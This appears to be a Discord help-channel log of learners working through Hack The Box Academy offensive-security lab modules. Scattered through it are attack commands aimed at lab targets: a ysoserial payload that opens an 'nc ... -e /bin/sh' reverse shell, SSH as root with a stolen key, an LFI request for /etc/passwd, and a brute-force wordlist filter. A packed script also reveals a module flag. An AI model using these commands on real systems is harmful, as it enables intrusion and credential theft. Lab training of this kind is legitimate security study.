#modules

You should confirm that your parameters are right. Loginform etc…

look its good command

When I remember Check the Login.php again, it maybe false

It was not like in the example I think. It was like admin_login.php or something

And maybe try rockyou-70 first. You can Save time since the full pw list takes longer

i find password but i try connect and and I am redirecting to the same login page

now other password

Now try to login with these credentials

In admin panel

I think I did it a week ago and it worked for me

I am redirecting to the same login page

Hmm

Maybe reset your session and target

i dont see this message

Can you share the command line?

Can you share which wordlist you are using?

Are you including all possible variations? Subdomains, directories and extensions?

Have you added the found subdomains to your /etc/hosts file?

Can not really help further w/o seeing the command line.

One min...

Are you scanning each subdomain manually?

Yes. Including all extensions each time.

I can not help further. You are welcome to DM your command line.

I am looking for a syntax error. You can replace any spoiler with [SUBDOMAIN] and [EXT].

does someone else having technical issues connecting to the Phishing target machine at the cross-site scripting (xss) module? (103)

Try generating a new target - perhaps the one subnet is having issues

if you're lucky there are multiple subnets for the targets

This command worked fine for me. I don't know exactly what's not right with that command line you shared before. @flint sonnet

Did you maybe type -e .ext1, .ext2, .ext3 instead of -e .etx1,.ext2,.etx3 (w/o the space between , and .)? (That's how it appears in your screenshot)

One or two index files?

https://github.com/ffuf/ffuf/issues/275

may be this is ur issue

The wordlist being used does not include a dot that's why you DO have to add a dot in the -e flag. (not like the extension wordlist)

ok

just tried to help

don't even know the context so I should just close my mouth

It just worked fine for me. 🤷‍♂️

I did not realize that you are using a different wordlist. Try.

Web Requests: GET Method
Q:Send a GET request to flag.php with two parameters num1 and num2 such that their sum is 1337.
A:??? -how do I do something like this when there is no flag.php- I mean I'm guessing I need to do something like:
<?php
$num1 = 1330;
$num2 = 7;

echo $num1 + $num2;
?>
or am I underthinking it
Any help is needed

Following up on this. Is anyone available for a DM regarding this section?

Follow the example in the "Query parameteres" section.

okay I'll try that thanks

Hello friends,

Has anyone here completed the "Using Web Proxies" module? I am struggling with the question on the "Repeating Requests" section. I have modified the http request in Burp Sequencer to do a recursive list all in an attempt to find the flag (The hint says its in a different directory --- it is NOT the flag.txt that appears right away) but I am still unsuccessful.

If someone could help point me in the right direction it would be much appreciated. Thanks!

thanks I got the flag 😛

@tranquil carbon hey, I got stuck on the 1st question of that same module. I don’t know how to format my answer. It is the one where you spawn a target and use the Ip and wordlist to find a different domain or something like that

I got like a blog and forum output

Just finished the Windows priv esc module. If anyone is stuck, feel free to shoot me a DM.

so i'm doing shell of anatomy and i'm upto the question where it asks for the language used in both shells in the format shellname&shell name but both shell used in explanation use the same langauge but just isn't accepting my answer, any help?

ok wow I'm stuck. I'm in the nmap module, where I have the ports 80,110,139,142,445,31337 ports open, of which I need to find one that holds some flag.
This is the section after the nc section - this section they talked about the NSE, and they hinted that webservers are the most attacked services blah blah - so port 80 it is I guess, but no results lmao (tried the -A, --script vuln, -Pn , and what not, but no flag. What am I supposed to do? Can't believe that I'm stuck over an nmap's module section for over an hour

Name of section?

NSE (Nmap Scripting Engine)

NSE 😑

mb

One min...
If you did what you wrote, then the answer is in front of your eyes.

Rah

How

I literally applied -A —script vuln on all ports

Some of them didn’t comply with ICMP so I added -Pn to the individuals that didn’t indeed comply

Nothing got returned instead of basic info

did you also have issues with ICMP and had to opt for -Pn?

That basic info, that's all you need.

well yea but there's no flag

There is. Soemwhere there.

All you needed is a script that's included in the category vuln, discovery and intrusive.

You used that script. You just need to go a bit further.

Any more hint would be spoon-feeding 👶

oh god I've went through that term enough - no need to educate me on spoon-feeding

the script doesn't work for me on port 80

--script vuln works?

the other ports.. I only get the hostname, which is I assume can be used for the ssh but no password (brute forcing it also didn't work)

nope

stuck at 97.97%

tried to time it out but didn't help as I mentioned

Give it some time. Even a few minutes.

I've tried several times

each time elapsed over 15 mins each

over the course of the last 3.5 hours

tried from the parrot pwnbox, tried from my own VM

I wouldn't have asked for help unless I've burnt through google and my other pen-testing friends

As long as you can ping that IP, it should work. Don't add any unnecessary flags. Just run the script.
And you can try the other categories I mentioned above.

running

will give it to run a few minutes, then I'm giving up

3 minutes in (threaded it over intrusive, discovery, and vuln)

nothign

welp

Give it some more time... did you add any flag?

nope

yea time is not at the essence, heading off to school - it will have plenty of time

man why am I even trying

let me gobuster it

LMAO

bruh this is bullshit

the scripts are running over 5 minutes each

gobuster 10 seconds - ||/robots.txt||

bruh

spoiler alert 🙂

well by the section I should've used the scripts' engine

never would I ever opt for using NSE for enumerating a web service

That's after you got a clue that the vulnerability is in the web service.

well, yea, but NSE didn't supply me with the fact that the port 80 was open

it was the regular scan that the library did

I mean I get that the NSE is good for databases etc, but not for the actual web enumeration

--script http-enum is included in those three categories I mentioned above.
More about it here:
https://nmap.org/nsedoc/scripts/http-enum.html

And once your scan is done, you'll found it out.

Bruh, I already tried this script individually right now as well as a few hours ago, and it was still stuck over 10 mins each time I ran it

I have experience in programming , I know what the required steps are before going on to bothering other people for help.
I’ve tried google, got a confirmation from intrubidus that what I’m doing is correct, still didn’t work.
I think it was just a screw up in the vpn’s bandwidth limitation..

Maybe try spawning the box again. Or add -vvv to ssh to get more info.

Google has some info about that. Found something related to MTU.

I would appreciate to know if and how you solved that.

( #boxes message )

Looks similar to your issue.

i just got the flag

IMO It's so bad. almost can count as a bug

why only replace htbadmin in one place instead of two places?

If you are still needing help with this feel free to dm me. 😁

hey! all

I am learning to hack

pls help me too learn

but how to install kali linux

This is not the right channel but anyway you can follow https://www.kali.org/docs//installation/ to install it easily

if you have any questions you can ask in #613049811481919508

and verify typing /verify ( in #bot-commands ) in case you're not able to see other channels

ok thx!

anytime

Following up on this again. Has anyone completed this module?

can anyone help me on getting started module in public exploits section I can't find flag

Please clarify in your question what have you tried already and where you are stuck.

I tried simple back up file read exploit in metasploit then it gave me a txt and I stucked there

what can I do

Then your "options" in MS are not right.

am I need set rport to 80 or a nmap scan and set to http port

If you got a file, but not the right one, then your RPORT and RHOST are right. Read the question again.

Sorry to interrupt, is HTB Academy good prep for tackling OSCP exam?

Anyone available for a quick question about on common app skill assessment 1 - about the shell part? Edit: solved of them that was about answer format.

That message got lost in time. Can someone pls help

Which module? Which section? What have you tried by now? What does not work?

Anyone tried the OSINT:Corporate Recon module?

https://xyproblem.info/

Hey! Can someone help me a bit with the 'SQLMAP ESSENTIALS - SKILLS ASSESSMENT'? After a few days i have still no clue where to find an attack vector...

Bro dm me i want to help you

open burp, look around by clicking different links and buttons. Open the history to check vuln params once you think you did all the spike

wait why dont i have permission for anything else

hi guys can anybody help with the skills assement module of login brute forcing I am pretty stuck here I tried so many wordlists already :/ [SOLVED]

any advice? been running hydra for over 15 mins

obviously used the assistance of wiki to gather information but as expected a wordlist made up out of a fictional character is hard to have faith in after all

20 mins running and only now it found it - seriously aren't there any better brute-forcing tools than hydra?

20 minutes? My goodness. They are not supposed to take more than 5 minutes. Are you increasing the threads number (-t 64)?

@dusk bronze Hydra is good, but if you want another alternative here is this https://github.com/lanjelot/patator

nah, only 4 threads

will for sure check it out, thanks

But be warned, it's syntax and usage is nowhere as easy as Hydra is 😉

🥴

Solved?

Hi, can you help me please? I managed to get only one flag for the case n°2 but I can't do the rest. I understood that I have to do something with the cookies because the id is stored in them but I'm blocked for the sqlmap command and how to find the flag, can you tell me please?
Module : SQLMAP ESSENTIALS
Sections : Running SQLMap on an HTTP Request

there are 2 ways to interpret the question of the answer u need to submit

it's mainly an interpretation error

the question tells u which username u should use

Hi

@real nacelle DM me.

@rustic sage DM me.

hi

U r a hacker?

do u mean ranking in the HTB?

I only did 1 starting point box yet😂 I am doing a lot of academy first

.

Why?

you need to elaborate first i'd say

I am just wondering if this is related to your original message #modules message @west rampart

It's not his business

Module: Hashcat
Section: Common Hashes
What's the way to go w/o trying all the built-in rules one by one? Any hint is appreciated.

i have a question on cubes

if i unlock a module for say 10 cubes

and upon completion i'm rewarded with 10 cubes

does that mean i get back the cubes i unlocked it with and end up with 20 cubes?

For Tier 0 modules, they are free as long as you complete the module.

Pay 10, receive 10 by finish.

No, you dont get 20 cubes. You get the 10 back that you paid with; so net gain/loss is 0 (aka free).

oh i get it

thanks

@rustic sage I have a hint for you. Did you do the Driver machine from the HTB platform?

If you have done it then of course you have stolen a hash then cracked it. Your hash algorithm is not that but the previous version of that hash 😉

I haven't done that box. But besides the algorithm, the "Hint" button indicates that one of the build-in rules should get applied. How can I determine which rule?

@rustic sage Check your DM.

Is there a way to get the student subscription if my university is not registered to the academy ? And also it does not have an academic email but I can prove it is recognized and I'm doing the course ?
Thank hou!

Have any of you fine folks completed the SQLMap Essentials Skills Assessment? I believe I have a found an injectable http post request but have been unable to exploit it. If anyone is available I can provide more details .

Anyone complete the Attacking Web Applications With FFUF Skills Assessment? Need a nudge on question 3.

Hello everyone any who can guide me in Web Attacks - Skills Assessment module

What have you tried?

Are you referring to "Attacking Web Applications With FFUF"?

I'm fuzzing the subdomains from question1 with the extensions from question 2 for directories and then files. I found a directory but can't find any files other than those that start with "." or index. Tried different wordlists from SecLists but getting same results. I don't really understand the Hint provided.

Thanks for clarifying.

1. The hint isn't really a hint, rather an instruction on how to enter your answer. Do not enter http://SUBDOMAN.DOMAIN:99234/XXXXXXXX rather http://SUBDOMAIN.DOMAIN:PORT/XXXXXXXX. Replace the port number with the actual word PORT in your answer.
2. A screenshot of your command line (w/o spoiling it) would help a lot.

STACK-BASED BUFFER OVERFLOWS ON WINDOWS X86: Fuzzing Parameters
Hi guys. I'm pretty sure i've found correct answer (length). But It's not valid.
I'm sure cuz when i generate payload of length x i have 41414141 in eip
and when i generate payload of length x-1 i have 0D414141 in eip.

DM me

Thanks for clarifying the hint. I got it!

Hey! Anyone else having problems with the 1st question of the "Shells & Payloads" module in section "Laudanum, One Webshell To Rule Them All"?

What is your issue?

i'm pretty sure about the correct answer, but the submission is not successful

PM me your answer

Hiya! I am running through the Linux fundamentals module just to brush up, and I am the Web services section where it asks me to start a web server using npm. I have a couple of commands that accomplish what the module asks for (start a webserver on port 8080), but none of them appear to be what the module thinks is 'correct'. Anyone have a hint?

Ah, nevermind, I got it! Though, I should add that the command the module accepted does not actually work on my VM, and I am seeing others frustrated by that particular question 😅

hi!stack in Shells & Payloads "Exploit the blog site and establish a shell session with the target OS. Submit the contents of /customscripts/flag.txt" i try to run the exploit but i get error "metasploit nomethoderror undefined method 'spit' "

Did you try googling that error? Issues with you installation of metasploit is beyond the course. Are you using pwnbox?

If not, if you've tried everything, you might need to reinstall metasploit.

i connect to NoMachine 1st so i cant do much with metasploit from there and from pwnbox i get the same error

Next time you get the chance,try using locate from the terminal to find the exploit name then in MSF type out the full name of the exploit.

can i PM; so i dont spoil

Hello. I'm just starting the Linux Fundamentals and I'm on the Package Management module. In the 'APT' portion, using the VM, it says taht I can check the repository for Parrot OS at /etc/apt/sources.list.d/parrot.list

However, on my VM, that directory is empty.
Also, the module says the terminal should read
[user name]@htb[/htb]$

but my terminal on the VM reads

htb-student@nixfund:

Am I doing something wrong with the VM? Should I just ignore this and keep going?

hello i'm doing the "getting started" public exploits

not sure what i'm supposed to do

found the plugin but don't really know how to send the options to run it on metasploit

Hey guys, about to run an ssl evil twin attack ap on my network would any one recommend an 802.11x dongle on with my pie machine ?

Go along with the error message you got. At least RHOSTS is not set correctly.

The reason you are getting this is because you did not set the VHOST option 😉

Set the IP address in RHOSTS then set the VHOST to be what is given in the module and you shall arrive 😉

Hi guys, can i have some help for Broken Authentication skill assessment. I think i'm so close

I already got 2 departments other than support. deparx.xs xn xt xr

grep '^[[:upper:]]' 0.txt > 1.txt
grep '[[:digit:]]$' 1.txt > 2.txt
grep '[[:lower:]]' 2.txt > 3.txt
cat 3.txt | grep -x '.\{X0,X9\}' > 4.txt
grep -E '$|#|@' 4.txt

then bruteforce, i should be able to login

hello i need help to find an answer to the ffuf

in addition to the directory we found above, there is another directory tha can be found.What is it?

Hey im on Shells & Payloads -Skills Assessment secound question, any help?

Please don't expect to get the right answer but just a hint. And for that, you would need to elaborate a bit more on what you have tried till now.

ok but i stucked on this for a long time

I am trying to help. But if you don't want to get helped, you are going to stay stuck for even longer. No one is going to tell you the answer off-hand.
The FFUF module has several sections. It's not clear from your message where you are holding. And without knowing what you have tried till now, it's impossible to help.
Therefore, please, just have mercy on all the people that want to help and provide enough details so they can help you straight away, without having to ask back tens of questions till your problem is clear to them.

@loud sparrow DM me.

Attacking Common Applications - Skills Assessment II
do I need to privesc? because I can't find flag.txt as regular user

I have made working shell code but I don't know how I'm supposed to make it run on the vulnerable server

Nvm just had to paste it after connecting

Hello all, is this the right place to ask for help with one of the Academy 'Getting Started' modules?

Yes it is

Excellent! So I'm on the 'Privilege Escalation' section, and I've managed to ssh into the remote host as user1, and obtained user2's shell. I've also noticed that I have access to the /root/.ssh directory, and I'm able to read the contents of id_rsa, however, I'm not sure where to proceed from there. I've tried copying the contents to my local machine, and ssh'ing using that key, however I'm prompted for user2's password. Am I on the right track? And if so, I'd appreciate some advice on how to proceed

You need to make the id_rsa file executable by typing chmod 600 id_rsa and then you can login to ssh with the root account using ssh -i id_rsa root@<ip>

and finally you'll be able to read root flag

I did that, and it still didn't work. Should I be saving the ssh key on my local machine, or on the target host?

Oh, wait... I didn't log in as root

D'oh. Let me give that a shot 🙂

Yes keep me tuned

It worked. Thank you! I do have a followup question - if I go to the /root/.ssh folder, and type ls -al, I see that there is a public and private key in the directory. Am I correct in assuming that the owner of the key is indicated right next to the permissions?

Well done

Yes that's correct

Appreciate the help, thank you

No problem, ping me if you need some further help

One last newbie question for today - If I want to identify my account or see my rank, do I enter /rank into the chat here?

You first need to verify typing /verify in #bot-commands and then you'll be able to see your rank as a discord role

Like mine with "Hacker" for example

Ok, cool

But typing !rank will show you your rank on the server, not the website's one

Friends who can help with Windows Local Privilege Escalation? The last two modules.

Hello Fellow hackers

I’m struggling with the network enumeration with nmap IPS/IDS medium lab

I don’t know how to find the DNS version

I believe that the port is the 53

Someone could give me a hint?

Hey guys, I also need some help with the nmap - hard lab, is someone online?

Can I get a sanity check on the Windows Priv Esc module?

Nvm I got it. Box wasn’t stable

@main vapor tnx it worked

@urban sage do you have a second, to give me a sanity check on that?

I haven't done the nmap academy module. :-/

damn it, do you know of someone who did?

Not right off nope.

feel free to DM

@woeful oxide

@teal socket I did the module

I can help

anyone did the hashcat module and can help?

Just finished with it today.

thanks, I might come back for that offer tomorrow, my brain is mush right now

Hello all, hopefully a simple question for you - does the http.server python module work for sending remote http requests, or does it only work for local network environments?

did you find the answer?

yes

Hey guys, I have a question about a hackthebox academy room.
I think I'm missing something and misunderstand the task....
I am already administrator in the dashboard and changed the cookies to log in, but what is the solution to the question?
Is it the admins name, the cookie, or something else entirely?
Please give me a hint, not the answer itself.
forgot to say it`s the "web requests" module and the "post method" part

Try to put a screenshot bro

do you mean from the question?

Anyone have a moment? Stuck on the privileged groups part of the Linux Privilege Escalation module.

Hey team. Having an issue with this question as when I do the nc -lvnp 9443 I get "listening on 0.0.0.0 9443" instead of "listening on [any] 9443"

Under Getting Started ?

No, I've already completed that one. This one is under Linux Privilege Escalation.

Which part are you needing help with ?

I've located the directory that the group has rights to, but am struggling to find anything useful in the logs.

I don't think you'll find it in the logs

I haven't done this one yet but my understanding of the question is that you might need to search for something like an APP_Key in the log for a base64 or something that you need to decode that will take you to something else

I can always be wrong having not this myself

otherwise maybe a call for linpeas?

Good thinking, I'll try and search for some keys.

could somebody help me with that? Maybe some have done the room?

Looking at that section again to see if I can help.

thanks

Anyone got time to help me with the File Upload Attacks module?

Is anyone else able to see the support-popup at all? My browser complains about adblock - but there is none enabled.

#613049811481919508 In any case, there is a bubble at the bottom right.

Anyone have any help with this? Stuck on the privileged groups part of the Linux Privilege Escalation module.

Guys

Any help with the firewall IDS/IPS evasion medium lab ?

I am doing the Windows fundamentals, and I keep running into an issue where I can RDP into the windows machine without issues, but if I try to ping or smbclient the same machine it will fail :/

@raven scarab not sure if it matters but on the hydra bruteforcing module, i couldn't ping any of the target machines. But was able to do Hydra attacks against them.

Consider the firewall in Windows. This is one of the key lessons learned in the module 🙂

Hi everyone! Can somebody help me with reverse shell for this java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'nc 1.1.1.1 4343 -e /bin/sh'.
Victim on Windows Weblogic

No luck yet huh ?

anyone on hashcat skill assesment? I am on last question and I succeed 78% of passwords but the frequency is not fine enough to get the answer. I ran out of ideas to increase the %. Help, please.

Not clear to me, since with a lower % I got the answer. 995 hashes. Cracked 65.

Just rockyou - did not get to masks and rules yet.

You only need the users in INLANEFREIGHT.LOCAL domain.

Maybe you are not using the --username flag? W/o it hashcat associates each hash with a username, therefore if several users have the same password it would get counted as one.

thank you, it was that the flag... thank you!

Can someone help me with assembly skill assessment?

I get a segmentation fault at line 7

Hi everyone, I seem to be stuck at the skills assessment in the SQLmap module.

I think I found the right vector to SQLi, but I can only retrieve database names/table names/column headers and not the data within.

All data is marked as <blank>

Can anyone give me a hint here?

d5w dm me

you need to grep inside var/log files

I have been, I guess I'm just not sure what I'm searching for. I tried searching auth.log, syslog, alternates.log, etc but didn't find anything interesting

will do

mov    rax,0x10b29a9dab697500
```here ?

Can u tell me the context

and the question

I don't have the module sir

What is it for. Is it a question or in the lesson

ok and the code in question is the one above that u sent

?

Not anymore

send me the code

that they are talking about

thx

Can I code these in regular notepad

anyone down to help a beginner in the "Check Knowledge" in the getting started about hacking module

Hi I'm stuck starting point on the preignition machine

What is considered to be one of the most essential skills to possess as a Penetration Tester?

I can try. Where are you stuck? What have you tried?

alright so i got the foothold, got the user flag, and then i set up the reverse shell.php, i found out by doing sudo -l that i can run /usr/bin/php, so got the reverse shell.php code from the module that was showcase in the nibbleblog exploit but instead of root i got a normal user login instead of the root one. So basically i need to get a reverse shell php code to get root access, i cant download LinEnum from my vm

Great! You're almost there. Look for a different option @ https://gtfobins.github.io/ under php.

Hey! Anyone else working on the "SHELLS & PAYLOADS" Module? I've struggled a lot getting a shell for HOST-02 with METASPLOIT...can't get rid of a "NoMethodError", so finally i decided to exploit manually without msf and got the flag...but i am curious whats the matter with the msf-error, as i think the modules purpose is not doing it by hand

got the reverse shell code for that but im still the default user www-data

probs done something wrong, doing this while eating isnt eazy

got an idea, i can read a file that a normal user cant E: using php* but i tried and couldnt

god dayum i got it, i forgot to run it as root(sudo).I cant be dumber than this

thx for the reminder of GTFOBins i forgot that existed

Could someone dm me about the assembly code for task 1 in skill assessment? I just need to insert a print function in a loop but I'm lost

In LFI module I stuck at the 2nd page, I was able to see the source code of 2 files - although not for all 5 pages - but I can't seem to be able to get the /etc/passwd file... I think I understand the source code but I guess that's not case otherwise what I'm trying would work...

Please help me I am on the web request module and the bottom bar isn't showing up for me and I'm not sure if is a problem with the instance or my browser

not sure what you mean by the bottom bar?

ah I think you're using a pwnbox... if that's the case you can try the Windows or Windows+a keys and if you still don't get a menu I would respawn the box

I just spanwed one in my module and it looks nothing like yours and I don't really use the pwnboxes myself so I'm not sure

I prefer to use my own VM and connect with the academy VPN

Alright I will keep that in mind when I start my next instance tomorrow cause I'm on the free plan also thanks alots

Please don't post spoilers

Hi guys, I'm currently stuck at the skill assessment 1 of the "Attacking Common Applications" module. I've figured out the possible vulnerability and did successfully fuzzing the ||cgi|| directory. And from the POC that I've read, it requires that we know the ||script name|| on the server, but I've been fuzzing for a whole days with all kinds of file extensions and wordlists but no results. If someone can give me a nudge that would be very helpful! Thanks in advance.

you have to put the subdomain name instead of the ip

download the vulnerability 50064, use msf

you have to put the subdomain name instead of the ip

For the "Included" Tier2 module, I'm not getting a reverse shell on port 1234 as in the walkthrough after performing the "curl" command. Kind of stops the entire lab exercise. any suggestions?

This is the command used: curl 'http://10.129.164.96/?file=/var/lib/tftpboot/shell.php'
and the contents of the file is returned with correct IP and port

Hello, I am a bit stuck at the module Information Gathering - Active Infrastructure Identification at the following question: Which CMS is used on app.inlanefreight.local? (Format: word)
How can I query app.inlanefreight.local in combination with the ip-address?

Yoo guys, currently on the javascript de obfuscation module and it wants me to get the flag but it doesn't show me anything beyond how to get this line of text

eval(function (p, a, c, k, e, d) { e = function (c) { return c.toString(36) }; if (!''.replace(/^/, String)) { while (c--) { d[c.toString(a)] = k[c] || c.toString(a) } k = [function (e) { return d[e] }]; e = function () { return '\\w+' }; c = 1 }; while (c--) { if (k[c]) { p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]) } } return p }('g 4(){0 5="6{7!}";0 1=8 a();0 2="/9.c";1.d("e",2,f);1.b(3)}', 17, 17, 'var|xhr|url|null|generateSerial|flag|HTB|1_4m_7h3_53r14l_g3n3r470r|new|serial|XMLHttpRequest|send|php|open|POST|true|function'.split('|'), 0, {}))

and so with this line of text, how can I find the flag?

awh lol

got it lads nvm

Thought the flag was in the text I pasted above but it was in the HTML code sorry

thanks!

hello guys.

so while im working on hack the box - academy modules, I want to use my own virtual machine instead of given workstation.

https://help.hackthebox.com/en/articles/5185687-gs-introduction-to-lab-access

does this step allows me to connect with the academy modules as well?

@graceful glen Same concept, but different VPN file.

When you do modules you will be provided a file, just use that one.

i see. thats something i was worried about.

So I am working on using web proxies but I can't seem to find the vpn file for it. do you know where i should check?

Not every module requires one. If it does, you will 100% know that it requires it.

And you only need to download that file once as you can use it all the time throughout your journey.

oh I see. so if the module do not contains one, then I have to go other modules to find one and use that to finish other modules with my machine correct?

If the module requires it then yes you need to connect to the VPN using the file they provided. Otherwise you are all good.

hmm okay.

becuase the burp started to get laggy in workstation for some reason.

thanks for the awesome answer 🙂

Hey

Anybody done hacking wordpress

I am stuck at directory indexing

Cant enumrate without logging in at wp-login

@mint karma DM me.

not sure what it's asking me to do here? SSH into the server using "178.62.107.125:31817" if so how? as when I attempt to it just says unknown host

when adding a Vhost to my /etc/hosts how does it work?
I assume you have to assign it the IP of the original site without the Vhost, but then, how exactly does the header Host: vhost.somesite.com get added when performing a fuzz over it?
As mentioned in the fuzzing module, in order to actually scan for connectivity you have to include that header in order to connect to the vhost, so how exactly would I add such thing to my /etc/hosts file?

ahah nvm I got it

I am too smart

joking

in the module I am in they run this nmap --script smb-os-discovery.nse -p445 10.10.10.40
when I run it with my own windows computer it doesnt output what it outputs for them, any idea why?

its supposed to output this but it only outputs the port and state and service tab but not the HOst script results

oh wait is it not giving me the same output as on htb module because the version of it cant be exploited?

Anyone here completed the Shells and Payloads module? On the Skills Assessment I'm not sure why i'm not able to use the 50064.rb exploit that is on my pwnbox. From msfconsole i am trying the use command followed by the filepath.

sorry for not being any helpful as I haven't done this module yet, but how was your experience with this module? anything interesting/valuable? (Contemplating over doing it)

In LFI module I stuck at the 2nd page, I was able to see the source code of 3 files but I can't seem to be able to get the /etc/passwd file... I think I understand the source code but I guess that's not case otherwise what I'm trying would work... anyone can provide a quick hand?

@tough ibex @west canopy Make sure you are using the foothold machine.

And, there is NO NEED to download the exploit from online. The module author was very nice to ___ (fill in the blanks)

Because even if you download it, you don't have write permissions on /usr/share, so you can't put it where Metasploit wants it 😉

Which is/are

Split or something similar?

hmmm, I did not get this one, I got something else. Make sure you set all of the options and set them correctly.

No

No something is not right

It was 172.X.X.X

hello guys

im trying to get into hacking/coding can anyone show me the basics ?

damn

this is my first time ever asking anything

can someone help me with windows fundamentals course? im stuck on the last page skill assigments

@ornate canyon i believe i had to follow all the steps listed at the top of the skills assessment in order to get the answers. For example i had to create the user Jim before i could get his SID.

And create an HR security group, etc.

ah yes thanks

i created that user then group and did last 2 questions

I hate windows

I remember doing sharing stuffs permissions and services on windows server in my academy but this powershell is pain in the ass

@ornate canyon lol . Hey im glad you got it though!

In LFI module my curl request just hangs there, any idea as to why?

Is the workstation meant to be blocked from internet access? Doing the POST module and I’m pretty sure that I’ve got access to the admin account ||via changing the cookie|| but the page doesn’t show anything besides the welcome message, and console shows jquery is undefined. Any attempts to hit internet urls just spin forever, so that would be why I don’t have jquery…

did you get feedback here? I'm having the same problem. Login with user "svc_backup" in Windows privilege escalation - Windows Built-in Groups is not possible. Same for user "netadm" in DnsAdmins and user "server_adm" in Server Operators

did anyone complete the Shells & Payloads module?

stuck on static analysis part in Assessment SECURE CODING 101: JAVASCRIPT, could anyone help me?

@tepid peak What help do you need

Still stuck where I was yesterday... In LFI module my curl request just hangs there, any idea as to why? Pretty sure myt payload is good as from the index.php source code nothing special happens to the payload, no added extensions, no blacklisting.... I don't want the answer, I just want to understand why this payload doesn't get a response:

┌─[✗]─[user@parrot]─[~]
└──╼ $curl -v http://178.62.107.125:30475/basic/index.php?language=/etc/passwd
*   Trying 178.62.107.125:30475...
* Connected to 178.62.107.125 (178.62.107.125) port 30475 (#0)
> GET /basic/index.php?language=/etc/passwd HTTP/1.1
> Host: 178.62.107.125:30475
> User-Agent: curl/7.74.0
> Accept: */*
> 

The question is simple and the index.php file doesn't prohibit this request from going through so this is driving me insane.

@hollow bramble Which question in the module exactly?

Using the file inclusion find the name of a user on the system that starts with "b".

I got the index.php file of the basic and wrappers URI and the index.php and config.php files from the extension URI... in the basic URI nothing is appended or blacklisted so my payload should go through, but it doesn't even generate an error message, it just hangs there

Your payload seems fine to me. How about forgetting cURL for now and just doing it from your browser?

same issue... nothing happens

Reset the target and then try again.

already did many times since I've been stuck on this for 4 days....

Then I do not know what is the problem. If it persists, you might ask someone from the staff maybe.

hmm ok and how would I do that? the community-help section?

I genuinely have not done that before. (One last thing to try maybe is making sure your firewall is not blocking incoming packets, check that).

I doubt it since I can change the payload to receive the index.php file... but anyway thanks a lot ... I'll try to see if anyone form the staff can assist

I have a question about the file inclusion module

||When I try to poison the logfile with php code it always stops the output being displayed from file inclusion, is this normal? ||

I'm having issues with cracking the hash 978078e7845f2fb2e20399d9e80475bc1c275e06.
I ran hashid and looked at the examples online and it's obvious that it's ||SHA-1||, albeit, when I run hashcat on it using modes 6/7, with the mask ?d?s, and without the mask, it returns Token length exception and Signature unmatched accordingly.
The token itself is of length 40, but when I run wc -c hashfile.txt, it returns 41 (perhaps the suffix \0 constitutes that extra 1 (how we write strings in assembly)), so this might be the issue but I have no idea.
anyone who finished the password cracking module and can throw some light on this issue?

It's regarding Host-1 from the skill assessment, I was wondering where you got the credentials to log into Tomcat in the first place?

I only got them after reading the hint and don't understand how / if I was supposed to do it, it wasn't a default password or anything

"When in doubt use brute force."

@tepid peak i think the credentials actually didn't work for me when i tried them but I'm also not the sharpest tool in the shed. I believe i just navigated to status.inlanefreight or whatever the URL was , and then uploaded an aspx Laudanum shell like on a previous section in the module.

tomcat | Tomcatadm didn't work but I probably was doing something wrong.

and where is that from?

Ken Thompson, if you mean the author.

I also did that but it wasn't even in rockyou

Then the author's intent was not that maybe.

auxiliary/scanner/http/tomcat_mgr_login did you try this

The module is about "Shells & Payloads", so it does not matter that much whether you can guess the password or not I think.

And behold, now that you got a new password, add it manually to rockyou.txt 😄

Maybe your next victims might have it also.

They worked perfectly fine for me.

@main vapor well you know me. I still wear Velcro shoes because tying laces is way over my head.

Truly valuable knowledge from a module about RCE

solved, I used 101 mode instead of 100.

@tall crane Don't advertise servers here please

kind of an awkward question, but any idea why I might have the poorest connection on my VM (pinging google.com is a shit show, while access youtube.com through firefox is easy peasy, while on my main windows pc that is running the VM, pinging google.com and every other web service is running perfectly fine)?
things I tried, which all didn't work:

• closing my vpn
• renewing my ip on my main pc
• restarting the VM
• pinging other services

@dusk bronze Do you have any other virtual machines you can test on? If you're using a Kali VM maybe try a Parrot VM. Also I would maybe try using a different virtualization software if you haven't already.

yea I solved it now

apparently from one CTF that I did I installed some docker that establishes connections and I just forgot about it and somehow it pushed itself as the main network interface

so I removed it and restarted the host and the DNS is now working correct on both the host and the VM

and thanks

np 🙂 nice troubleshooting

I am trying to exploit web server on HTB module which is using wordpress 2.7.10 and has a "Backup File Read Vulnerability " but when I run the exploit it just downloads a txt which lists a bunch of file directories?

JESUS CHRIST the Cracking Passwords with HashCat module is a fking nightmare!

@dusk bronze hey but it builds character right?

Can anyone explain why the kali terminal changes from having the color coded commands to no color coding when you ssh into another box?

ok I'm totally stuck on the second question for the module File Descriptors and Redirections. I've been googling for the last 45 minutes and tried everything I've come across including HTB forum posts. I cannot seem to figure this out.

I've tried dpkg -l | grep -c '^ii' and got 2792

but that's not the correct answer

apt list --installed | wc -l gives me 2793

still wrong

just tried find / -name *.deb 2>/dev/null | grep systemd | wc -l and got 4

Need help?

Seems like you are not connected to the target machine.
Run that command once you connected via SSH.

thanks. I see now how that makes sense. I'll try it as soon as I can. I'm having technical difficulties getting the target ip to spawn

Hint: The output of that command is still not the right answer. Inspect the list: Add | head -10 to it.

And please be accurate. The is the Linux Fundamentals Module - File Descriptors and Redirections Section.

so I have ssh'd into the target system. now I tried apt list --installed | wc -l | head -10 and the number was 738, and is still the wrong answer.

That's right. Of course, it's wrong. wc -l counts ALL lines. All lines are indeed apps?

ah I got it!

I used dpkg -l | grep -c 'ii' | head -10

Can you explain what the difference is from 'wc -l' and 'grep -c'? It seems like they are both commands to display something..

sorry i'm very tired

may have already gone over this in the course

You would not need head -10 then. The reason why I suggested adding it, is so you can inspect the beginning of that list. It shows you the first 10 lines.

Please ask me again once you went briefly over man grep and man wc 😉

These two commands gave me different results.
dpkg -l | grep -c 'ii'
and
dpkg -l | grep -c 'ii' | head -10

the second command, with | head -10 added, was 1 less than the command without it.

🤷‍♂️

Please try again.

how can I wrap something in a spoiler

A screenshot or text?

screen shot

the final command was 10 less

747, then 737

I can't make sense out of it. 🙄

XD oh well. Thanks for the help anyway. 🙂

Anyone can explain this screenshot to me, please? 😕 (#modules message)

Hi 🙂

Anyone for the file upload skills assessments ?

I’m virtually done, but thanks for offering.
It was quite a rough journey because instructions are so unclear (at least for me), and I find myself strengthening my BASH in this module rather than password cracking lol

who can help me with a c ++ problem?

I will give a try

whats ur issue?

#programming Also give more details about your problem otherwise nobody will be able to help you

I don't have access to this channel I can't write anything there

